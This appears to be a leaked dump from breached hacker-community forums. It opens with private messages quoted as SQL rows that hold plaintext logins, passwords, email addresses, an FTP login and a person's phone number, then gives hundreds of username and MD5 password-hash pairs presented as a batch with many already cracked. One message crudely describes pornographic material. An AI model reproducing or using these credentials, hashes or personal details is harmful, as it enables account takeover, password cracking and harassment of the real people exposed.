-(4369,'a3a07bfce2','Dear Mr. Tesla,\r\n\r\nI\'m glad that you got the word on -the t-file, but have you seen the entire message that G\'Ratte sent me on this? -\r\n\r\nSign onto:\r\n\r\nhttp://www.nsf-osc.com\r\n\r\nyour user name is: -tesla\r\nyour password is: ju6Ha4RA\r\n\r\nyrs. trly., -\r\ntrammel\r\ncDc-NSF\r\nOffice of Special Circumstances'), - -(1172,'a8a8bee0c7','I dont want to post links in your topic as it takes away -from your deal, but if you ever need full videos, pictures, celebe sex crap and -so on you could always use...\r\n\r\nwww.myfreepaysite.com\r\nusername: -siphter@gmail.com\r\npassword: shutyoureyes\r\n\r\njust thought I would share -if you eventually find yourself in the need for more -material.\r\n\r\nunfortianatly nothing tooo disturbing besides a little bit of -midget porn and women wearing pig snouts rolling in the mud/getting it on with -redneck looking actors *shrugs*.'), - -(1972,'00c465f4dc','[quote:00c465f4dc]I will probably never get a MySpace -account[/quote:00c465f4dc]\r\n\r\nyou can have this one i just got for you -:)\r\ni believe you can just change the mail addy and password and thats you -sorted. \r\n\r\nIts totally blank and i have entered no personal stuffs on -it.\r\n\r\nLogin: \r\nbrok3n_5w0rd@hotmail.co.uk\r\n\r\nPassword: -Pr$raTrUde8r?YEpUjubrAVAjuq-Ph-brUCHAthuyevazus-ajESpequ$eD2$res\r\n\r\nlet me -know if your taking it or not so i can delete it, if its not needed :P\r\n\r\n -:wink:'), - -(5189,'939ca5f807','oxy do you think you could fix my forums? something -happened this morning I think someone purposely crashed it. I dont know much -about forums the install and stuff but my whole site is crashed and I didnt -change anything. If you get a chance can you take a look at it? \r\nthe hosting -site is bluehost.com \r\nthe login is \r\nhouseoflupo.com\r\npassword is -\r\nlupo5105539792 \r\nI would really apprieciate it. I am gonna be out working -all day but if you can or you see a problem you can call me at 510-409-5805 -\r\nI hope you can help \r\nLupo'), - -(2417,'b53d2e7dec','Heres my old account,\r\n\r\nI took the liberty of -resetting the password, do with it what you want.\r\n\r\nUSER: -Expl0iter\r\nPASS: 9ggbsqud8qp'), - -(4896,'3d46021522','Hello HackerJacks,\r\n\r\nhere\'s a mail-address along -with the password for the NSF myspace -account.\r\n\r\nworld380grab@hotmail.com\r\n\r\nzvud39eq\r\n\r\nGo ahead and -experiment... when you have the time and when you\'re feelin\' creative. -\r\n\r\n(I believe that Trammel, you and me are enough of people to mix with it -- we can continue to post new ideas and changes in the NSF forum, so we\'re all -open and directly open for eventual feedbacks)\r\n\r\n\r\nPrison System'); - -(777,'a92b1f454b','Your User ID is: 24871\r\nYour Nickname is: -anonymous1985\r\nYour Password is: ySI@9#aUuL\r\nComments:\r\nAccount\'s -expirationdate: Lifetime\r\n\r\nyou can download some ebooks (Directory) from -there!\r\n\r\nc ya'), - - ftp://netherplex.ath.cx\r\nusername: cdc\r\npassword: bowtothecow - -~~~~~~~~~~~~~~~~~~~~~~ - -This is our first batch of hashes from CDC sites. Overall we have hundreds -cracked, many from this batch. - -Ratte:051ac3686b8abe43c5edc6104eafcbd9 -Myles Long:041b04c50d21dd5b395bf6c0cf14021c -THE NIGHTSTALKER:c2cea03312c672df706b17a73776e7ec -Phobes.:e62b81ab40fcd2b00dcd85872059b702 -Zodiac Lung:6e14abde32362461479b6eb142c1ac8c -crash.the.greenhat:168a9fde3dbf064581b5a70dfaa6d720 -Deth Veggie:e2a74f8237efa357701566ef7df3847c -G.A. Ellsworth:99c578e2573657a1c1199277a88ebbdb -Comrade Smack:566878e0be809a762ba96ae555669237 -tenko 2.0:fa4861da7f8dd99fa6684f71d1e8fcb3 -C+Ace:86db7eb681baa16d04788d5ea7e9339a -Møøse:0002579ac5d8341f9e0b9cad54b93e54 -Lizzie Borden:3b8ec70648c7c65c4706ed15ed3a9764 -Razor Sun:a9137015501a9d3126a6da851fa641cc -Smoking Samurai:b7ccd6ef2722c6651d054e39b936c100 -cracking man:250c4a1ad1f0eb6851bbbde570446c57 -E-Young:2954a75a99c9f007642c77b5a88c9c37 -Thomas-Gonzalez:e2a07aebcca338b80d255a974da46392 -Alien FX Fiend™:ef166a234ab2355ed86941beb11052c2 -Bucephalus Bill:ac710609337b35b6f8bb316cb8cee699 -TERMINAL ILLNESS:213fbf04308243bbf926fddce394bb31 -Black Hawk:7b28355ee66f6104410879b8c1c4c579 -bradley.strider:6a5d0040d95557abfcddb562659a7db3 -Kunt-magiK:13202e9f52832708bec42341fbf29c10 -desert disciple:a6918cbdec446566822f4dd52846b3c2 -Dr. Obscure:5213097ccbffbfd3dd262860a3c15afc -Knob Macabre:ad198a36c4a282982870e3e2e65ae3c6 -Murder Mouse:11fc8dce5f80a336286eb6742b52607a -The Fat Controller:3501e91721f4d44c1fba1d450cd96e9b -Oliver Johnson:9119cd2303a26ca2ceb0a20e3baf5444 -Script.lord:8338d353f1ee7a23e20e733a8ac78aeb -Dark by Design:2a167bd2ada0d057f1ce8c80354cec36 -Prison System:97e680069d0f40d03c2413d74d86c26e -techno.phreaky:94cb8f5d29c10533cc6195f70466054f -mInD-fUCker:109b856c1c5d5deeeb213ef2116abdd8 -cobra commander:90eb5a154fdce42cf9156e91a1ac0ca7 -Tuff McQueen:6b8dc2fc513873cece34e2b206f7c2be -Robert London White:ec09439c9e2d0096328122976c36f34e -Enigma++:0289c05ce4675b7ca3cc7b97588715cf -(Erus_Gulielmus):a32847f941dbbecc245d6457fe8baee6 -H@x0R:1991583a74d7e2f1b5bc566c90f8eba0 -St.Michael:6e4dc8789c4c44329db1b54b1bfa67c0 -concious.dork:0ae1b5455e1664fe3ccbdb0bdc09ac45 -XianGen-Cyberian:9a5a8c3bad367dd94fb2a2a6264ef262 -Max Payne:9d8d214774072d4f898e2c1dfbd83e06 -Miss V:57918bd0392843f81e8c8b9a5bb5bd6c -spæcemoses:7584702f0d510bb60f7518099554f934 -Albino Rhino:83b3dca6eb79a6e76f5b0be342394269 -terminal bliss:5ef64bad8f9d7e0c85f821580e4d6629 -Electric Synapse:06d6984ec68cc222f1cc2889027e07bf -.r00t.:410de21c4f9b8b1f315061fd486ff84e -The disciple:a3e2a6cbf4437e50816a60a64375490e -Jonathon-RossBBC:e42d0f1d5dd2e6e939db87fb4b84bfeb -Shadow[King]:1198fff1e6c597fafef5ad7275a615f2 -Forex Autopilot:ad39f31800eb1f80893e97de59f9cf9d -Ãàç Ìÿññ:2070575d7b50aead682cb4fd3296d363 -Online Forex Trading:ad39f31800eb1f80893e97de59f9cf9d -ñòóäèÿ ðàçðàáîòêè ñàéòîâ:22d45e839622e3f274eb9967639d0e34 -muza-mp:a84d7b154314a6b13a83ee8248e8c471 -Expemelve, 6, 10]:bb73cc1bdf2d625cccd110a4a55c3802 -ID 1792351271490:4b28268c60712474ece8cbb1b35963ad -f!lu:c0cd808c7777432515bc71bde6ec91cf -am cheap link maxpages.co:cb572c9f55143058d1cc585b5ee2376d -hanse jumi:927b812982ff876497f1687e9c7b3982 -Area 51:5f4dcc3b5aa765d61d8327deb882cf99 -Alex Sheredan:5864396db6a69353aebcee625715c569 -abs-akb.ru:30f777b51a6d3bda47413d5a76dbdea0 -Altix-Pracownicy:d86f732093f64c90ec2f13537950ce12 -rand_seed:50ed9fd20c745885b7272c615462fe3c -elliot:31d633afa4a59dbdea092c205d70e728 -PhrenchToast:a0949786136090042cd6347f340502b0 -hardwire:9a4336a169bfdee858a6fc59ab2d288f -punkle:b7c14d6a7409cf1180d0ffd193dd79b6 -Devolish:eb33ae1ff7ca2dabb87413d804601548 -jtesta:4edfa4371d4a5c37ffac0826cd8eded9 -KEMiKAL:3a9cb7722e527f11b887ec522151f3bf -oxycolton:066e35354d1a9a729479ffee44f05daf -MiB:3e39d801245868d79bf5ab7272028ba6 -Flack:2b2ccb175239cae64c837304e720aa25 -diskrez:13202e9f52832708bec42341fbf29c10 -trammel:48622ee13d958d6ebc9c6767970bd018 -Delchi:4fd19c09606270a5c0c5e7589430604d -ndb:b4fcc5bbea2edad406f481406344198b -Omnininja:a0886448f38e32abc6063bc71fb6143f -Major_Small:5eb86157f52125281b73ba5467ca9000 -Seahawk:2d46f6286511bd2e22f9c02907274872 -javaman:873642673b3e109b7e29cdc405220da4 -hexcrasher:9bfcd76aa225795c7c5e2ea8a65deef4 -blair:51c46caa0cb9ab9a734d57f9de90fb7f -romoe69:46a3a57ba68e0411b1e20de64ac864e0 -GreenDiamond:298ba7ab72b23bfbe47fb587a8c685a0 -Lupo:857e092b039831db7c560589c27d8581 -Oxblood:873c86bd9489bdb9bc4701cd6ed5b148 -e4cf17:606b187995d931d432455cf6a1da7e13 -xen_ix:17d50dd10685dabb24cc2baa5dcbf95a -Bjarki:b5f1460aa7fce17ea92fc90064c32372 -Artough:51d320aa4c3e0044adc76c32f9ee1537 -xxxclusive:7f796692038e6e4d5357ac154d2f9fa7 -Arrakis:0c184ae1170cbcf85e332005fb826847 -n0vashinrh0n:d4d103b63c3894d443c02027a0874763 -b0bsquish:5f4dcc3b5aa765d61d8327deb882cf99 -screv:ddb4d8f124c2b2d98e0db9401acfb3f5 -psg:dc23b9d50ed76bd6b86ca2f0a2273871 -1justin:0a9a24e386a2e574f67eaad188882960 -blizzocan:a955c56e9465c01ac341080ae1a07d1e -xardoz:d5b3aa4417f55a9025749cca2d196ac1 -gauss:a8f223f158b5214f73e4b2520bfbd7d8 -Eron:89659c52d996d2b1d52cb200ef53e0cc -0x0B4F1E:0b7d7b9483c0c7d6aa7c016918567624 -bky:dd67354489b7f34533ceb009e6831d7f -powerpork:c4557e8fbedb16fa5c0360d813b25552 -five:ad198a36c4a282982870e3e2e65ae3c6 -viraptor:3168ce9eb7dfb8c59bc6a59e894d773f -talonprime:8b65996657feab900109f216f4b951b6 -emonk:82f0035fbb0c2ef33b1b672b82410fdd -HackerJacks:4ff9fc6e4e5d5f590c4f2134a8cc96d1 -Yoder:70b9657e0e3f757994ea46c531cc4a81 -bunker_mole:11c7d03bca67172930c441f5de48d6ea -Dr_Brain:b3c437a88ac17986943e01ef2138d1cb -mneumonic:f7cc0816f76e4deeba470587c91df43a -picklejuice:e7be4ab4bf5f114040e0a65215602787 -Ketamine:bb358eb6ff2cc1090440672054575989 -SketcH:30f3d2c47ee2a972cd30ca6af4e22859 -livet0die:7c32b256d3b699444f2a8973de12fe54 -olorin:a6d711410b1935a68b7a1b958d72eed4 -darksorcerer:a83c83714f5a0cb6af6920981d9c26c8 -data:da41a32705178dee05b7bb467e1c03c8 -THat:d10096a9193be0834de0be5d516dbd49 -dildog:d579d6458828f0765c9d53d155e45dea -lowlux:f49ac0580e48a2437fcbac2f91cd3e28 -EyeEatBabies:eb0a191797624dd3a48fa681d3061212 -Andsu:f112263a7306667b5bd7c50d1d9b36db -President_Z0mbie:745cca4b603e4b964323e903f8fd9641 -BlaCk_eYe:059b39e1caaaf47400e93a3603665537 -JAmes:e9130da0c8ae54b547e29692f9755d43 -ziader:3fd6b6210e33bb046e69f256a138e28d -Zake:26d09d93c921ceb2345f64eff4f5afa1 -Kale:769ac34a4012ab69c069de0bab7d9e81 -eep:4ac5376990919861672b2339f030ba38 -twodeadclerks:711b4ff5e4b873c36c59430cc1ec07a9 -ilikeitlong:3e1eac855d4e6b1d89ce38562b567161 -Coyote:4d9bf358d47ca6000d3a7efd000d1399 -C4li:1fb822d4cd10d6668cebda99c0bda7f6 -UsAr:ad921d60486366258809553a3db49a4a -Synapse:8c1830fd30b6a1e9a3500fe171831ccc -dandanthemuffinman:48c9b232a43faf43306be988fe13c448 -netf1r3:56df7567866562d307ad6c9033f4ca77 -FreakyKid:94570475400b54a048fd3751d02e4ab7 -Itachi:4fb313b758546bf0e9233998cde252e4 -guimberstein:82cc783c70e23a8db8ffd42aa1478305 -Mitt3ns:d162e0f138236116da423d16f895d52b -kevin:8f30aaff82ff04ba82c9de73ca54662c -lowtec:65d4dbaa8795667f7348da0f412b1821 -batch:10b3917a4ceb166514d9a21365f4064d -VoiceOfAnarchy:8885137029b1660987835a801644c6a6 -fiend:c8e93626191a59ea5d04fd93280d04d9 -niles:5297b609864f97c7386aa4adf47e7e40 -Yogaboy1:bb7b3bf5da4be50a0d6d704d62e40424 -frost_bite:16117430a59745a71ada3bc32fa4bcd1 -Circuitbomb:63e30cd76dd8fc1d3125fa49c18988f9 -Zm0g:b031bc78e9a65f1ab6b67c6f65f0263f -41ffa8:6cad5ca90cc4ef023a40ad03bf554bc0 -bamfninja:0928ccc7e05f86ebeecdb991a92892a5 -Tesla:c90907d87411dcd2776ac3f3b424db51 -Dragon:804ecc3f1cb809d390233c24998787a1 -danhorse:7168831f3009f4f6365a63434c9f2128 -Brok3n:8e9f7dc871d93cf7820fb77ae00de68f -draphur:9a6cf7cde75d0d465d434625f8d16980 -Phalmos:dffee2242d9707cc0c7ad1d6c9c3306f -Lagato:3ddba2b624d97be3868625fb9de3193d -WarizWizard:7fed6412e317e20cd4fb612b8a49104e -rude_b0i:78bfb5213c9c7214c2018a3e488d2dd7 -Tigger:551c3dea75ae8ce63aca56b886033f03 -skavenger:bcbba6ea168dd085d4c8ca33c0b2b74d -Shardin:4f3448839842418bb5c539e3281ced8a -BadLuck:e3c457dcaa297645765a25bacd628c31 -ToAsT:332b415377e44d3c540e1d1d6f1567f2 -NewYorkCityDJ1:60923b534bd6546d6c6ae3919bd098ee -Swordoath:5532d3445adc38872b35e28b49a90ebe -GrimReaper:b811200981f92189f52007b5f415d6b3 -Globetrott:e16341542a9e826f53505da7cd8b79bf -opscure:dfa410a0fbac3a2e5983192b73b03f3f -Pink_Sock:0229701f49f9c56ad98d1841296e8094 -Synked:8e45bb741588f3069381464a2ac80833 -8558a0:0906463c48177ca8125395430b12a90c -Monarch73:d58295f6b3fb30f0c66af9f7f8a7cfd9 -fc9066:a3778021c56580c2ab1a47ba106eb391 -jr4199:4aec1b90bcc2b114d7c2b59b34531c75 -kevinownu:d2e7a2105d0fb461fe6f2858cc33942f -Angelick:1f2b94756bddedb40b676ecb47a6c03c -Feterious:de4453db392a7666789c059a84965e5a -Stained:ddcf4466a7ee29215b8595e30b8bfbe4 -cidvicious:754b61fdebe82d42d971896ff04d03dd -Bobdilan:96012f1b9151c4fc2587f42157e4214b -drakhen:5f0495252428aad73e1eb1d3569aacc1 -ProFfX:e6c5f305a9eaeca77c6bd7e04d5dc9ff -SoulWrangler:d58e0ced71781bcab403785e5abc7d9b -slappy:fa422d1350696d60ac916a20274e73d6 -GrepManGeorge:e04f76630885093f10c5e494f5d59a6b -imburne:07e3a328b980cb7f1a64891eafbd65c4 -hillbilly:2fe23ed02968afce29327f30a43c2b09 -Daemon:bc155319eb2311c0e4099948026eac82 -NetV1rus:cbeb887e56773c34f74a2092d4b0f308 -agent:b3bb9856d25105e8103c2bc3b83772dd -Lawlcakez:a3fa9e0b6b24b1cada4b756c0d240444 -Sune:09ac778e8dfff712e4d92a5af55cd8bb -drape:58f7814bef1e9b9dc3971658a934a92d -snn:6b727629c42d31823a4860589a364446 -DaYuM:d3e3baf113e5e9c6479d49c722282f4c -Icehat:8563e34a8f0a8b7af3ff946eb40bfe39 -nilosopher:f4c404ce99f4af9639429a7c6a33c493 -SergBrin:3ca4a2427dc4c8d15e47307acba0cf36 -swilliams66:7c030396d9f21564fa2e7951cd00c09c -TipOfTheDay:c385bd7435973c04779aea5e1a2d2a39 -freq:e56b57a27a5db36e0875c7c09e5572b5 -raniendu:7b4963d9517eaf64f5ce8c4c0f109779 -lpirkel:30b9aa52cd78ba681e06c80e11919b21 -laura_glow:1b4b951cd59de23b03bbd37263f273b4 -jamsoliver19:fa379a8a5b037a2cc60c92ca6442c1c1 -xero:bda4a1c0a6a7011e39e8064d85003941 -martins:e10adc3949ba59abbe56e057f20f883e -B_P_Shikamaru:4af899129a7df530da4a7827f38b65f5 -StopMakingSense:af9403dc577555480a995a3f956e69fa -jester638:c20e1dbb59999987ed9bc6475272ad34 -Doctormstr:f9a2d4d9675416458657735d003005ea -dodobird:efdc8aa869642809b0f0132706218f0a -Patient0:3469e490774712a2ac9cae36777c2c32 -Mutz:fa9caa83aaa6bd7794a9008c51641ed4 -datsexipre:93ecfe6659110b27eef94379adf7ed61 -qxorllarrin:8f07a1f303677caa201f5cdbc919aec4 -bauducco:9392b82aed310e684230f31ab6784f15 -HaremShaih:81d6c0ca5ffc2614539e8014383890d8 -DrLight:8afa847f50a716e64932d995c8e7435a -scalper:433838b8e94f74f54484ab8447e17190 -servomapper64bit:ee32c528d93251cf5cb94b62199f1cf5 -aceboon:48a64e76e4269d14bfe3b66a795290a0 -oilin924:2155d31a22fe6ee6a50646946a1c3f04 -poupqyre:59cea70990c0c77f015064d58afc907b -AntonBorisov:b450d17912f0b25d07eac5549da842b3 -quoxi:21e9cc103b0cd96ed6c43206fac7c390 -muukie:c750cf4e238d6a8bc8ab0ff287dbdf98 -oopuooo:2e3b360a4d57c0b62c054743c5bba1a4 -oopuoooo:4c9af845029ee22f4ddda4fa10875c66 -bishopbnw:d36c7d792beadc2d0b7fe0634cf70c62 -jonahb:fb43bad754f800d8dea44e1b27c81693 -cr0w_:d13c3245a79d9bdc868a51493fe9c6fb -Maestro:6e535e69e85054b0ea5b4a2bc6475fc1 -_spartan:9ff03b95d695199d19af7c1a585ddffb -aaron5891:4f73695da6719c1c34f607bbd9f76173 -HerrKenny:6c92d19e417b68326df9f19fc5d2b912 -foyaeman:c071a2c19eaf37fc1e8d4dc21363c3c4 -Spooky:641217f9b40e8f947cf6592b243d010e -shrimpnuts:6ecdee663466055c669003fbb7fadfb5 -Naaraxi:6a425f0afec6c854a179c9e43a563211 -jonykhan:9fa0630ee43d6d92d3e133423d0193a1 -HereKitty:c3d603a9dcfb2aaee4a22f765607bc2d -Dysentry:2cefc5d2cdae8e8ca734f68d092857b2 -syphilis:2cefc5d2cdae8e8ca734f68d092857b2 -spywarklk:6682fe087628c965380de41587920ff8 -outlaw314:4e92ab772846da6b919aa76929377f33 -thehhhyips:13da1579cf49494ecfb747f6b20c3251 -blyth666:87df2cd1570fd297de238aeee667fe0a -meojive:b39bb33c7c09cd29119bddee1de7377b -raccoon:e9c805aa2b08a78fe28c2acb747520c7 -444f0c:f1efe30b6fe204bc8069b2ceeca556b5 -forexadgg:2961717dca03b27b1849694b548a1e92 -fantasy1:c3581516868fb3b71746931cac66390e -h0llyw00d:2fa3142377a4210181fd609990097a8a -zaperlos:e5af68029283805b13dce903ff09c646 -cmp:a4b59b8c7d3ceab0b8a0d169162bc91f -UltraLedy:023c9b058e472c17a642ce3aade5e6bc -packeterror:c07d163783323e823d6e355be228acbf -DevilAsh:7199d24631b0ad7b0c07c5a4203f8446 -YaMich12:5cb4513cfc2df2472d5e9a0d06364f01 -ThunderAppeal:69e112175d0327c195bebf57e46ccec1 -dindon1956:509956de681eafc35732e4bfcf653568 -Eleonor1979:2cb0d3c1aa24029b871534383326beb9 -j_aroche:d08a289293f2e2be5abc0270ed4eeb45 -Zed:5e99a9cae3933eb9e1bdab4698d5645a -lopaayd:60e8252721fecd2864f10831d1a7d178 -dendron2005:1c3215fed8392192761b33a8da0d3eaa -Siphter:e00b43eba42351357c752bda29593dbd -Veritas:6c433aa5e05914c312e6c0171a544427 -LOVEBoy:8750e6f9777aea82ac05214c8053d80f -samhummr:0f29c3b19980ed96bfb00cfbd34b03fe -MaxwellHouse:8c06dea8f14bc56eb89a8b409f40cb2f -GreyGross:b6775ee7b72d8c0ec6bd9113cf3370aa -TedBronson:ce0c2638039fd1c91ffc4da06c8ec114 -Eros1966:3dc364b05a6a1e9d47b234bf0d9b55b4 -haribdas:9b33ff84602e9454e9ffc1b1c3f63106 -rainbow77:302032b73c23b3fbccd747b753969667 -chronicburst:955fb354f3074f3505620d725ca95acb -raoult:decc8686654b465e5313259325149a86 -TomJones:a1ebf827547488577b280d572f718eee -freetramml:2c4584cc9f38ad5213c64c5c86eb60e3 -cathodeX:57e438dab8ece92cd680c79eea1503e4 -D1ve:8593d24afefd4c0163072d417c3bc9e1 -baesparza:38a85d96057ac7acc03c63bcc1fb6c13 -RubberQueen:1b9346069c088529619e9e936102e84d -system_error2007:74566ce597f2ef1029a41a03aa878dbd -Defaced:911e5c48ddc066cf6114138ac4fc26e5 -fj:af4979da84c5ebc066f67fec2434e7ea -spyz:fa2a4db1e94da9aedc6645903dc94362 -entr0py:ad6610ac1c9cf4a77b5d8e16322a29bb -hedegaard:da1f06233fed32a00332fb1703739623 -Kite:02a9db41ba064181c4866554360edc2b -HazMathew:6c3ec14691052e9c611aa7920ed682e2 -Jethro:06acc2d63c49e5a851268bb0d73242eb -gnumasterblaster:f0697998d062eb8449f28ef3b182b741 -Simon:b46c3d00580f46ee6eea0ce95adb5c01 -xronis:d6a6bc0db10694a2d90e3a69648f3a03 -Lovelace:5e5b1465e014d1f34cee1354acc99da5 -shaggy_f117:7e3d6b141eb4c95c5b1f91a8cf606df6 -Exclusivecon:b78fe15bec09b75c7fed9a567b342379 -tetsuto:87ab1091dadc85902209dee3019cebcd -NinjaCalf:69afbf12c86eab4fe763ae150fdf9826 -ghoststrker:7d3cb17ed307914a2802d23bbe64768d -Purd:e87eb2416cef7c4985401b423d6381b4 -morninglightmountain:293cb6af8d9939b04d3980e3ea6e4055 -RS2Crat:cd701b6fb06d4e424da1010f9bf86fe3 -2pint:4dea5b040074aca058fcaeeaf156dfb4 -Rollin92:94127db2a9dc420585f23720bc933ac3 -L0pht:55ec18f1a2d0c4a06fc506f6eb569cd5 -Tenmoab:a3124f9274c2a936f8da9015ba08b01b -DarkCarnival:a3adcac08a3386377c3c142944547609 -inertia:c7a6002549b0ff54324ecce62cd9ab6d -bobofat:33df6e9ffac8b48642b1d92224dea9db -grendel39:35c3813a114723bb8927049ba1eed92c -woo_nasty:4a621342de0b91d567690bd43e0c8894 -prosubmit:aca81e0911791cb36a988ed05176d808 -nickakavic:d6a6bc0db10694a2d90e3a69648f3a03 -a5an0:23467d5248a35c9e9993d1b98c81a8f3 -Smirtor:49d2f5fc3e2eca2194255f7198b247cc -fdilemma:26c7c843789ff67a0eaa9f5fdbbe3000 -teslafreak:a96d41c420a150ffd17c581e18c523be -Poetryfreak:3c1da2975427007f8803af0aefeaead6 -holokai:553b870fcbe428d2dabd3b8d9f4335ca -ax:1f1e01e89825e3a3c858a076a357b279 -paradox:fc324f364da242d7f5cb29979187020e -greencross:a8768fa8b790fe85f134b3930624cd8a -StonedGeek:75bcddae3a9da2f12d7a7d6c8d5c92fa -mATT:7e1e8c772178c0d2f83ac45c4585e2fd -at0mh3art:2fe6d17fe09969e9f7bc3b4e54f64064 -bbmommy7010:ff09268004d6398850cf1805b0f88f57 -klutch4891:5d724c3b904d1ef471a33ae7eeaedb37 -nolok:b8bba949e4ab747d4668f1e427db3c16 -m3rl1n:be5be367f2294a7e6625b3ef5ead78df -cosmicruz:d6f38a0019c9cc1dc983545c0385a593 -qwertyadd:cd139eea70a69111db3d589c5794f3e5 -Psycho_Fish:2c65e3d15495806a79e3e5389681b8c2 -Admiralthrawn999:78e95f9bf958c95baa2177f791f130ec -m0nk:9d74a90067787cf6e4f58c0eb22c06f3 -Jimtherabbit:3e856f17b930bc83b2bed99c801e107e -Ocheetroic:28311c201b0e6ae42f15c9fdb8c0371e -s3xt4nt:7e1e8c772178c0d2f83ac45c4585e2fd -federicaiseabal:25d9ed3d8f2d3e80599ce1c422a551f8 -fatai2000:3556c6dc1edae85a27b3dfbabd17aade -Syke:52dca0dbe8890165800ab6807049bff6 -Starichok:9cb3f472aa52f3b6dae666e64cd350ee -time_flyer:1b00c138ce72644dfc45129444e4abd6 -kernelpanic:9f01731f8685a372ccad52d16baa2177 -mo0b1e:f6ee3fbc4e9d93dd7ce73cf9fa42174f -180andback:547f41ed2352ee1910b007824a23aef0 -r00tman:7ff5c96a10a8c94d641fe6bedd058ab4 -rubolf:b04de87135ae48d8d1681e3b8aaa1d15 -TramTram:02567cc5953bec53097491359e772633 -TheGondola:aaf95889d06cb44181d9ad2a32c83b20 -pyhrricmadame:ec9a77eefebd95f92c92c9221f1c1b85 -Tbonestake:a98bece87c67e6facf9bc0a19f0c5b92 -Johan:d5e9b9d8a96ae83adca439ced70c0dd2 -Tweek888:008fcaa51c412a6ae71be1487e1f4332 -bones:6facea6fa868d1984c2141f7697096d7 -Mystake:97f014516561ef487ec368d6158eb3f4 -Profeta:e6c5f305a9eaeca77c6bd7e04d5dc9ff -Nemisis:39e465353c34cd6e58d8a340d21a5574 -AphexMandelbrot:849e702446be2755d7c7d587adf840f7 -Colde:693ed399e0af4726fc77f4ba2a56105f -assrabbit:eed71a84b77ebe093326df8dfe49b7f0 -Deviant:925d7518fc597af0e43f5606f9a51512 -logan946:fff34ddb84dd38e1db0848babe7d7dc3 -SERPENT7:e6dd65880857802cd3d28ef67b35b8f4 -ShittyLiquor:50a087c2e2dd08d1f7b4b116a8248ea9 -ketameme:f5fe800fe70bb976241de58d0dc9f61e -Ni2v4NA:e914d1d079d19cc7897e3ca0cf207a20 -RestYotre:477515294f3a13c4bdb502bc5ab0bf39 -starquest:fc2188aec1c57625f8e147281d033c3e -Adam:96e79218965eb72c92a549dd5a330112 -monroe:c36c86822c55925d3c58c5e8e5c6b9e9 -fr3akk:d60068bece729cfe61ddf1118f5c7bb8 -XoVoX:11f2b473b698eb97084f054799f6ecb7 -qoqoz:723c668adc0188544cfa6e5d34b0db3a -c_Code_Troll:2df056327a585a1f41cd370595a3c971 -Techniza:35c8b9bbccd623ebcd584b236903cf65 -gawina:35a6e6252290422c5cfde294b2ab6b68 -Empire:7703fda651ef285632ed36dfca4da95b -Cyber_Knight:9029704dfd062a92ad41c31f767f12cc -gwar:65e9aaf60e27fbfac46903d6f558ee6d -gawbul:3de71aa30d86b295af0df2ba1c122d29 -DaMacc:c80805b69106298d5cc5ecc02c6171a4 -SummerSixtyNine:f1d6fb491e1616de212a4bb8eee9910d -kishan777:b1634c02812896b87fff3d56f89e36af -shezaracing:0b36f4717672eb4414b39a2becc19a16 -Kussic:72004baeee8546c67a47cd8e394bcc04 -_xXx_:5fe948ab65b1a76e8cf229dffd002b07 -mikkel:e99591317ed62da970a6c9505447680a -UFO:501de256787fd807b05437af3a47452c -f15h:486323d3e89f6c7190c13d3b56f2257c -tdmbom:ddc7e8b2cb0281d49e93bd7a84b216de -deathtek:382a6ddcb58edb4d00df9f1b7d0577b8 -TheM:4c309ec85aff6e3ac08016472a776640 -Bitchslap:d84a329803f89abb3d7b52f9825c9145 -eldertatenda:bb5d2c772db33cb45dd7af7d06802ac3 -ninjawong:284f15c5809b63e2a91ed084816cb507 -a1atom12:cd7a29e48853f83a61e64073ca8471f2 -NinjaNate:5e9d4a951a32db927a03eef04c86e9aa -lorem:ac9f39dadb6d8e66f42d03d13b67b38c -indone51a:63730649ee70f7bf66e3e51a5c86907f -T1m3:7ddeb448b19c372d57bc287adbe24f36 -70a10e:ee89391cb5ae89d0fbcf195a5c3178c3 -Time:57c92daebdaf710be7993926c6cf9677 -AM03BA:0d36ed6e087e315510de12da45506cd7 -dedado:9e9dad0f785e20fa8c27db929e72e9ae -xxtoster:e23b0e1854a64f4d7f0e4ba079647291 -criptop:7a9406d78bb0690c6f7dbf0b58a2155d -QuietCore:b52eab839ba2ae77d64999c7be1d47b0 -x4e:2c1fcdc08332cfe2b102c3bcd4641e1e -skagman:f544443f0b842ce62ccffd0c461d85c8 -angelsdemons:7976af491d4486978278c647324cafac -Tree:59771479da5a928009179e37f3482e45 -NewWorldOrder:20b4b72fcc8884b2dee9c51fc0c36d51 -Scar:486bf23406dec9844b97f966f4636c9b -Rush_999:6e9db03cb2f27d90d65eed013c07c0f7 -AdamWilbur:d90186b94e784a32a23006aa2b860695 -anuraj:2171c9bfefaf3eaecddce96df221dc92 -FrontalNudity:27a5148ea0fbddae22d902bea9a19531 -amaqua:3b6710895358d50ddd8bfc671adfc8f6 -Nua:501de256787fd807b05437af3a47452c -JinxedLizard:c46645f0c4768e07bde2e77690ebdce1 -looney:b7ea98cd69ae5aca4e4b772b51cefe3c -mgarcao:dc483e80a7a0bd9ef71d8cf973673924 -Zaratustra:f31721e13bf7d3de925ab67c73d8a16a -toolbelt:9a578407dc33a0d241ec556c20affde8 -JackieC:3ccd5f4463c703ab70a23431de350d47 -terminus:b6d544abbc9ecebbd706a72f9dfb2760 -HeretiK:f4ae294a56d57e0b78e57b5594d272a5 -TheHacker:a23973cb8c3633f49701f904b3a7ffa1 -hellstrand:d1e0597abe1c682aa68f8473cc2e77f7 -randarton1978:7d8d597b48c6fbbec9137c5fb9f0fba4 -g3rk3n:18ccca11b693313aebbc6957784bb026 -tomffm:73d7a384e5d831bf2c2538bf0ce5efce -dotCryptic:c6e38c659391d71681d17efea7d131c8 -virgeus:261fd340c5370f978acb9d8a2f5758d9 -Le_Gr0s:ef172db63fd20bf2eb0d2c30687adc2e -JakobCreuzfeld:61f3ff770f465adefb12b68be0c71326 -O_o:dfc10bdbcec595e4d0eec87390895c43 -davidcooldude:56b0fbc82e5050909a1fbd10de711dbd -king_ofall1:7f582fbdcf1f1389014ade3b20bcfb6c -xhteam:6ec2dcaa390c982d912d7d4f123250e7 -Saru:17e0a7934a01206745a1b20fe4cbf2ff -hellrazor404:1c9f88e9d5186a76b666ed76c6b091c7 -gagowen:312e2d6f2bf243142bc8d1a89da8c8a5 -bushellberry:365a0b3ba521beed0b9cd78cf11c65b5 -Barbosser:5882f017f3b758936a28abedf3af0770 -bboyivann:5f7bd1c85e1ece6e5415694f909058ad -foolhart:1112a3dd2d648d72be8d6db4fbe597e0 -BinarySoundSystem:0d000039a991b3803a3a77d758303eeb -enorganik:08f2e2bfa99462eddc18088ef4df4dfc -Nathan:4baf5897963fc12d1cd8fe1a02eb48fb -DeepwatherLiption:1bd59037940b5fa7c9b0690dd52fc64f 